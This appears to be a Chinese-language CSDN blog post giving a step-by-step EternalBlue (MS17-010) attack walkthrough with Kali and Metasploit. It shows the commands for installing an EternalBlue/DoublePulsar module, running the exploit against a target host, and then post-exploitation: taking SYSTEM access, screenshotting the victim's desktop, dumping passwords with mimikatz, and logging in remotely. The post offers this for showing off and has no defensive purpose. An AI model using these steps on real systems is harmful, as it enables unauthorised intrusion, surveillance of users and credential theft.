勒索病毒 (远程执行漏洞 演示)

最新推荐文章于 2024-04-11 16:13:22 发布
最新推荐文章于 2024-04-11 16:13:22 发布
阅读量1.7k 收藏 8
点赞数 1
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/82393173
版权

先决条件 

准备好弹药(MS17-010 SMB下载)

kali系统

 一台刚装好的win7

 

在kali的命令行中输入一下命令

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/

Cp -r deps/eternalblue_doublepulsar.rb/usr/share/metasploit-framework/modules/exploits/windows/smb

 

 之后我们进入正题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

首先打开我们的msf框架

 

 

 

首先看一下我们有哪些攻击的漏洞(这些需要之前去网上下载)

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中近期更新的针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

 

 

 

我们利用的是MS17-010 SMB RCE Detection

msf > use exploit/windows/smb/ms17_010_eternalblue

 

 

 

首先我们先看一下这个模块需要我们添加什么样的参数

RHOST  这里我们需要添加受害者的主机

剩下的不用填

 

 

 

 

 

msf exploit(windows/smb/ms17_010_eternalblue) > exploit

一般第一次攻击都不好使,没关系在试一遍就好了。

 

防火墙即使开了也防不住

 

 

 

 

成功拿下之后可以查一下当前的用户级别

System 很高哦!!!   (科普一下 system > administrator > user* 大神绕过)

 

 

试一试 创建 删除 等命令(在C盘下)

 

 

 

尝试一些可怕的命令比如 截张图看看他在干什么!!!

(1)桌面抓图 

Exit退回到meterpreter

1. meterpreter > screenshot

 

文件保存到  /root/FsdXhovL.jpeg  (他在看什么???)

 

 

 

获取系统管理密码

meterpreter >load mimikatz    //载入模块

meterpreter >mimikatz

 

用户名 q 密码 123.com

远程连接一下试试

是不是很强悍!!!

 

 

 

会了这些是不是感觉逼格提升了一大部分!!!!!

   

然而现在并不好使了 这个是勒索病毒的时候流行的 现在几乎所有的电脑都打了补丁了只能黑一些刚做完系统的啥都没装的机子  emmm…………   拿去装逼吧!!! 

时光凉春衫薄
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
批量勒索挖矿常用漏洞利用工具jexboss的简单分析
si1ence的博客
08-21 1775
0x0 简介 jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console、jmx-console、JMXInvokerServlet、struc2、Jenkins等漏洞并且可以直接获得一个shell,杀人越货勒索挖矿必备神器。 起初,攻击者会通过JexBoss工具对JBoss服务器执行侦查,随后利用漏洞并安装SamSam。与其他勒索软件不同...
勒索病毒漏洞扫描工具集合
01-15
集合了常见的几款勒索病毒漏洞扫描工具,方便进行安全检测和漏洞分析。
Sodinokibi勒索病毒利用Flash漏洞强势来袭
systemino的博客
07-24 407
自GandCrab宣布停止运营以来,勒索病毒攻击事件并没有随着GandCrab的退出而减少,全球各地每天仍有用户因为数据遭到加密而损失惨重。在后来居上的各个勒索病毒家族中,Sodinokibi勒索已经成为了现在全球最流行的勒索病毒之一,也叫称为GandCrab的”接班人”。 Sodinokibi勒索病毒的部分变种在加密后会将受害主机的屏幕设置成深蓝色,因此也被称为“DeepBlue”勒索,早在该...
话说大部分 的勒索事件来源于RDP远程桌面协议?
最新发布
04-11 792
这家安全供应商在周三发布了其2024年的活跃对手报告,该报告基于它在2023年进行的150多起事件响应(IR)调查的数据。数据集的分析显示,88%的调查来自于员工数少于1000人的组织,而55%涉及的公司员工数不超过250人。尽管44%的勒索软件攻击案例涉及数据泄露,Sophos发现72%的网络入侵调查“没有数据泄露的证据”。报告指出:“通常,被侵犯和未被侵犯的组织之间唯一的区别在于1) 选择并部署合适工具的准备工作,以及2) 在需要时具备的知识和准备采取行动的能力。“更糟糕的是,凭证加固的状态令人痛心。
勒索病毒远程桌面——防御方案
weixin_43075093的博客
06-05 2133
所有在局域网内运行windows系统的电脑,并非只感染服务器操作系统,单机照样感染。会将你电脑中的所有文件全部加密,部分已感染案例有2个共同特征:一是开启了远程桌面并使用弱口令,二是系统防火墙已关闭。 本例的前提是硬件防火墙已经开启了外网通过445端口访问内网的情况下出现的。 重视!!!重视!!!重视!!!
永恒之蓝勒索漏洞复现
aiwodouai的博客
12-16 2229
下载2017没下补丁前的window7版本 然后先查看本机ip 192.168.140.130 先找一下我们目前局域网存在的可能被我们攻击的主机。 首先使用 nmap 命令扫描局域网内的所有主机(因为 ms17_010 漏洞的最基本要求是 需要开启 445 端口),这里使用 nmap 的最基本的扫描,直接命令后跟 i p , nmap -sT 192.168.140.1/24 ( 扫描整个局域网寻找存活主机并查看其开 启的端口) 对于开启了 445 端口的主机进一步分析,寻找系统为 wi.
勒索病毒漏洞检测免疫工具
06-28
勒索病毒漏洞检测免疫工具
勒索病毒漏洞修复工具
04-11
2007年勒索病毒爆发,这是漏洞检测与修复的工具。2007年勒索病毒爆发,这是漏洞检测与修复的工具。
Aurora勒索病毒专用解密工具
04-07
Aurora勒索病毒是一种恶意软件,专门针对用户的数据进行加密,从而勒索赎金。这种病毒通常通过网络钓鱼、恶意附件或者漏洞利用等方式传播。一旦感染,它会使用强大的加密算法对用户的文件进行加密,使得用户无法正常...
勒索病毒应急与响应手册
01-01
勒索病毒应急与响应手册 本手册旨在帮助用户和企业防御和应对勒索病毒的攻击,提供了一系列的防御和响应策略。手册共分为四章,分别介绍如何判断是否已感染勒索病毒,如何进行应急响应,如何处理已加密系统,以及...
勒索病毒防范指南
m0_68649618的博客
04-10 1159
2017年4月中旬,"永恒之蓝"攻击工具在网络盛传,5月不法分子通过改造此工具制作了WannaCry勒索病毒,一时间全球众多医院、高校、企业、政府及个人PC接连不断中招,受害者被要求支付高额赎金才可解密恢复文件,这是勒索病毒第一次以如此"亲民"的方式大规模渗透进各类网络。 2017年12月13日,"勒索病毒"入选国家语言资源监测与研究中心发布的"2017年度中国媒体十大新词语"。由于近年来数字加密币的流行,勒索病毒感染正处于愈演愈烈的态势。 无法估量损失的新型电脑病毒 勒索病毒(英:Ra...
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
MS17-010永恒之蓝漏洞利用(windows7 32位)
逍遥小哥的博客
01-11 600
第二步:把Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb 拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb。sudo dpkg --add-architecture i386 (开启 32 位架构支持)sudo apt install --install-recommends wine 安装。然后安装win 32架构。接下来开始用msf来打。
NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑
weixin_33730836的博客
09-19 949
本文讲的是NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑, 安全研究人员认为,世界各地的脚本小子和在线犯罪分子正在利用Shadow Brokers 黑客组织上周泄露的NSA黑客工具,致使全球数十万台Windows计算机正面临网络攻击威胁。 上周,被称为“Shadow Brokers”的神秘黑客组织泄露了一套据称是属于NSA“...
Windows勒索病毒“永恒之蓝”漏洞补丁包
热门推荐
个人视角下的技术领域探索
05-15 1万+
本次勒索病毒感染急剧爆发的主要原因在于: 其传播过程中使用了前段时间泄漏的美国国家安全局(NSA)黑客工具包中的“永恒之蓝”漏洞(微软3月份已经发布补丁,漏洞编号MS17-010)。 1、仅限Windows_64位操作系统,非Windows操作系统不受影响 2、已更新补丁的的Win10系统亦不受影响 3、为方便下载安装,特此献上下载链接。Windows补丁下载 4、如提示保存,请保存后运
记一次Windows勒索病毒应急响应实战
Canterlot的博客
09-04 4483
本文记录了一次详细的Windows应急响应流程,包含了各个排查项目,建议对照《Windows应急响应基础》阅读
NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析
weixin_34417200的博客
09-19 7084
本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1. 概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的NSA(美国国家安全局)黑客工具。这批黑客工具中含有可以配合使用的一个攻击框架和多个攻击漏洞。这次的工具主要面向的是Windows系统,攻击框架非常易用,漏...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值